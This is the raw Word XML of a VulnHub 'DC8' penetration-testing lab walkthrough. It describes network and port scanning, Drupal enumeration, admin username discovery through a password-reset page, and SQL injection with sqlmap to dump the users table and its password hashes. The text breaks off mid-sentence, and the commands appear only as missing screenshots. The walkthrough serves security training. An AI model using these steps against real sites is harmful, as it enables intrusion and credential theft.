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9FD6" w14:textId="7206D321" w:rsidR="00301156" w:rsidRDefault="00301156" w:rsidP="00F50EB2">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Walkthrough – DC8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADE83EA" w14:textId="15776347" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="20286845" w14:textId="085E1EEC" w:rsidR="00116BAF" w:rsidRDefault="00F50EB2" w:rsidP="00F50EB2">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Penetration Testing and Defence - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F2F7A1D" w14:textId="2B6C614F" w:rsidR="00116BAF" w:rsidRDefault="00116BA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39517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7DDD7" w14:textId="295056CC" w:rsidR="006E1BF0" w:rsidRDefault="006E1BF0">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3BE6FE99" w14:textId="1346B546" w:rsidR="005D3FA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8374" w:history="1">
            <w:r w:rsidR="005D3FA7" w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Device Discovery</w:t>
            </w:r>
            <w:r w:rsidR="005D3FA7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D3FA7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D3FA7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc144148374 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005D3FA7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005D3FA7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005D3FA7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005D3FA7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27C21597" w14:textId="530C3993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75" w:history="1">
            <w:r w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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BCF" w14:textId="79D6403D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76" w:history="1">
            <w:r w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Website Vulnerability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8C0" w14:textId="7C80B747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77" w:history="1">
            <w:r w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploring the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04D0" w14:textId="63C236EF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78" w:history="1">
            <w:r w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DroopeSca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6B16" w14:textId="000C3BB2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79" w:history="1">
            <w:r w:rsidRPr="00DE1D57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2ECB" w14:textId="2EC2F984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0" w:history="1">
            <w:r w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cracking with Hash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E8B4" w14:textId="64861A8F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1" w:history="1">
            <w:r w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cracking with 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1BC0" w14:textId="75E45FEA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2" w:history="1">
            <w:r w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Revers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9733" w14:textId="7E4CFB65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3" w:history="1">
            <w:r w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Upgrading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6282" w14:textId="5F19C834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4" w:history="1">
            <w:r w:rsidRPr="00DE1D57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ED0B" w14:textId="32EEF21A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5" w:history="1">
            <w:r w:rsidRPr="00DE1D57">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The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9457" w14:textId="436444F0" w:rsidR="005D3FA7" w:rsidRDefault="005D3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4148386" w:history="1">
            <w:r w:rsidRPr="00DE1D57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54F4" w14:textId="50A9A32C" w:rsidR="006E1BF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7DDE511" w14:textId="16A9C76C" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="0A5432A9" w14:textId="5B282841" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="2E9D1B8F" w14:textId="5C36FD89" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="44A960A3" w14:textId="30ED2E53" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="1616E937" w14:textId="07FDAC44" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="29C6528B" w14:textId="38596DEC" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="59DABEE4" w14:textId="37DA0799" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="42623918" w14:textId="4D35369E" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="0D7D30A1" w14:textId="16BF532D" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="44E6B226" w14:textId="614D3C9C" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="6B1B2095" w14:textId="0ABDF443" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="345052D5" w14:textId="08867A77" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="4DCA9581" w14:textId="77777777" w:rsidR="00E63BD0" w:rsidRDefault="00E63BD0"/>
    <w:p w14:paraId="02A6D025" w14:textId="1B66EB3B" w:rsidR="006C11EE" w:rsidRDefault="00EB2617" w:rsidP="008E7FA2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc144148374"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Device</w:t>
      </w:r>
      <w:r w:rsidR="006C11EE">
        <w:t xml:space="preserve"> Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1CF2182B" w14:textId="615E887B" w:rsidR="006E1BF0" w:rsidRDefault="006E1BF0">
      <w:r>
        <w:t xml:space="preserve">Performing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00413340">
        <w:t xml:space="preserve"> to discover the victim machine on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D45CFE" w14:textId="642B7558" w:rsidR="00C02797" w:rsidRDefault="00A92663">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D5F3242" wp14:editId="6BD9B5CF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5731510" cy="541020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20535"/>
                <wp:lineTo x="21538" y="2053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1EE">
        <w:t xml:space="preserve">The victim machine is 192.168.56.102/24. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7241966B" w14:textId="619A6CC8" w:rsidR="0015521F" w:rsidRDefault="0015521F">
      <w:r>
        <w:t>The Kali machine (attacker) information is IP: 192.168.56.101/24, with the interface eth</w:t>
      </w:r>
      <w:r w:rsidR="005141D5">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005A7FF5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00521728">
        <w:t xml:space="preserve"> This can be obtained using ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00521728">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00521728">
        <w:t xml:space="preserve"> a’ command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21163652" w14:textId="57CA13C9" w:rsidR="00C32DEF" w:rsidRDefault="00C32DEF" w:rsidP="00C32DEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc144148375"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6892B3D8" wp14:editId="75E125B8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>306895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3496945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1416" y="20463"/>
                <wp:lineTo x="214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73" cy="30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ervice Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0D8AE58F" w14:textId="06DC9844" w:rsidR="00C32DEF" w:rsidRDefault="00C32DEF"/>
    <w:p w14:paraId="05382E84" w14:textId="1E431AAC" w:rsidR="00116BAF" w:rsidRDefault="00D854C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E3DA852" wp14:editId="0F62EE96">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>379565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4191635" cy="592455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20836"/>
                <wp:lineTo x="21499" y="20836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2F">
        <w:t xml:space="preserve">This command will stop reverse DNS search (results in faster scan), don’t ping, do a SYN </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BE2F2F">
        <w:t>scan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BE2F2F">
        <w:t xml:space="preserve"> and only show the open ports for that victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D986E5F" w14:textId="66CE9550" w:rsidR="0045764F" w:rsidRDefault="0045764F"/>
    <w:p w14:paraId="2C4405E3" w14:textId="48A295C1" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="2057E11C" w14:textId="0E1E50BE" w:rsidR="00116BAF" w:rsidRDefault="00AB2D49">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4954541C" wp14:editId="3C0C4079">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>390171</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="39909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8" y="20661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CDA">
        <w:t>If we now re-run the command but this time specifying the ports and adding the flag ‘-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E60CDA">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E60CDA">
        <w:t>’ we can obtain the OS and service name and version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70182371" w14:textId="29BBAF7A" w:rsidR="006C1BA2" w:rsidRDefault="00AB2D49">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48678554" wp14:editId="2B1636A5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-11430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>186393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="426910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494" y="21137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2C2FC" w14:textId="274C007E" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="1982691F" w14:textId="3B079245" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="2C8329E6" w14:textId="3EEB254F" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="5E032FD9" w14:textId="2F7D7A71" w:rsidR="00116BAF" w:rsidRDefault="00CF7BBA" w:rsidP="00CF7BBA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc144148376"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="654500C1" wp14:editId="20F46440">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>303720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2214245" cy="309880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19918"/>
                <wp:lineTo x="21371" y="19918"/>
                <wp:lineTo x="213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05" cy="31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site Vulnerability Scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="11C93AED" w14:textId="61811131" w:rsidR="00CF7BBA" w:rsidRDefault="00CF7BBA"/>
    <w:p w14:paraId="748BC557" w14:textId="1C9B0BBD" w:rsidR="00116BAF" w:rsidRDefault="005F7D0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CC3C269" wp14:editId="063C1A1F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65760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488" y="21205"/>
                <wp:lineTo x="2148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16" cy="114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BA">
        <w:t>Running this command will begin a website scan which will reveal directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1E5E9" w14:textId="122E7DC1" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="0CD53644" w14:textId="6A8F97FB" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="21C66AC0" w14:textId="53FA172C" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="3C57E181" w14:textId="45D42401" w:rsidR="00116BAF" w:rsidRDefault="00A426C6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7ADDC74F" wp14:editId="767613AD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>189255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3538847" cy="1106429"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21203"/>
                <wp:lineTo x="21515" y="21203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47" cy="110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4F5D" w14:textId="4B603B6A" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="28B39DCE" w14:textId="2BFF4119" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="26CFA37C" w14:textId="06BF867F" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="7C975D52" w14:textId="55E412EA" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="29B68C3A" w14:textId="5B2E5227" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="67770835" w14:textId="5B9956FB" w:rsidR="00D61644" w:rsidRDefault="00D61644" w:rsidP="00C002DB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc144148377"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploring the Webpage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="24AACC2D" w14:textId="1F80B687" w:rsidR="00D61644" w:rsidRDefault="00D61644">
      <w:r>
        <w:t xml:space="preserve">I explored some of the directories and webpages found by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and found that </w:t>
      </w:r>
      <w:r w:rsidR="00CB1746">
        <w:t>the request new password page requires an email or username to reset it.</w:t>
      </w:r>
      <w:r w:rsidR="00E306E9">
        <w:t xml:space="preserve"> I typed in admin and found out that it is a valid username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF37DFD" w14:textId="3B237175" w:rsidR="00116BAF" w:rsidRDefault="007E0753" w:rsidP="00F254F2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc144148378"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DroopeScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Tool</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="59C4618E" w14:textId="7A892515" w:rsidR="007E0753" w:rsidRDefault="007E0753">
      <w:r>
        <w:t xml:space="preserve">I decided that since the web-framework is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, I could use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>droopescan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool to determine the possible version and the plu</w:t>
      </w:r>
      <w:r w:rsidR="004559A8">
        <w:t>gins for the site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9BF1A1" w14:textId="4451FD4E" w:rsidR="00116BAF" w:rsidRDefault="001164DF" w:rsidP="00243BD7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc144148379"/>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="533746A4" w14:textId="2EADB2FD" w:rsidR="001164DF" w:rsidRDefault="0070051B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E1C4233" wp14:editId="342F4941">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>227643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2137410" cy="256540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19248"/>
                <wp:lineTo x="21369" y="19248"/>
                <wp:lineTo x="213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4DF">
        <w:t xml:space="preserve">Since we know that there is a lot of webpages about </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001164DF">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001164DF">
        <w:t xml:space="preserve">, we should try to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001164DF">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001164DF">
        <w:t xml:space="preserve"> inject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A69D2" w14:textId="7B381031" w:rsidR="00116BAF" w:rsidRDefault="0070051B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7393E921" wp14:editId="30D22A67">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>227182</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="417957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FACC1" w14:textId="7C5C47B6" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="20A83125" w14:textId="6F72246B" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="08EBFDC2" w14:textId="692454DD" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="29E5615E" w14:textId="5FD51A1B" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="0D57582D" w14:textId="6ADE6C12" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="71E4D171" w14:textId="3E1C5DFE" w:rsidR="00116BAF" w:rsidRDefault="000C0231">
      <w:r>
        <w:t>We get this error on a webpage stating that there was an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C8AE1" w14:textId="22C59649" w:rsidR="00116BAF" w:rsidRDefault="00F258FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48AEC37F" wp14:editId="0F1ABFF0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>187643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4585970" cy="283845"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20295"/>
                <wp:lineTo x="21534" y="20295"/>
                <wp:lineTo x="215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0F">
        <w:t xml:space="preserve">This now means we can run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA2D0F">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA2D0F">
        <w:t xml:space="preserve"> map and view the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAA024D" w14:textId="6CB787D3" w:rsidR="00116BAF" w:rsidRDefault="00B145A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="043A1FC2" wp14:editId="659218F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814320" cy="309245"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19959"/>
                <wp:lineTo x="21493" y="19959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63FB" w14:textId="1FCC2B95" w:rsidR="00116BAF" w:rsidRDefault="00116BAF"/>
    <w:p w14:paraId="481B4207" w14:textId="35E8F6E4" w:rsidR="00116BAF" w:rsidRDefault="00636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5A449190" wp14:editId="331C5A30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3571875" cy="268605"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19915"/>
                <wp:lineTo x="21542" y="19915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 since we have the database </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>names</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can reuse the old command and obtain the table information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D428B16" w14:textId="2624774C" w:rsidR="00636C38" w:rsidRDefault="00636C38"/>
    <w:p w14:paraId="78F73215" w14:textId="0E98F2AB" w:rsidR="00116BAF" w:rsidRDefault="00F26998">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42408184" wp14:editId="61429602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1608455" cy="1604645"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21284"/>
                <wp:lineTo x="21233" y="21284"/>
                <wp:lineTo x="212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FA2">
        <w:t>For this I also outputted the STDOUT into a file called d7db.txt. This is so I could search for key words.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D43733B" w14:textId="146E72E7" w:rsidR="00116BAF" w:rsidRDefault="00F26998">
      <w:r>
        <w:t xml:space="preserve">This ‘users’ table shows the name, pass, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, and signature of the users from the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA817C9" w14:textId="7F114BD3" w:rsidR="00116BAF" w:rsidRDefault="00820BE9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A52E264" wp14:editId="12964CA6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3410585" cy="223520"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20250"/>
                <wp:lineTo x="21475" y="20250"/>
                <wp:lineTo x="214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E05">
        <w:t>We can now exfiltrate the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3ED5C3" w14:textId="2B0726CA" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="4C67ECD9" w14:textId="064249D1" w:rsidR="00820BE9" w:rsidRDefault="00223901">
      <w:r>
        <w:t>The flag</w:t>
      </w:r>
      <w:r w:rsidR="00491C7D">
        <w:t xml:space="preserve"> –dump means the retrieve </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00491C7D">
        <w:t>all of</w:t>
      </w:r>
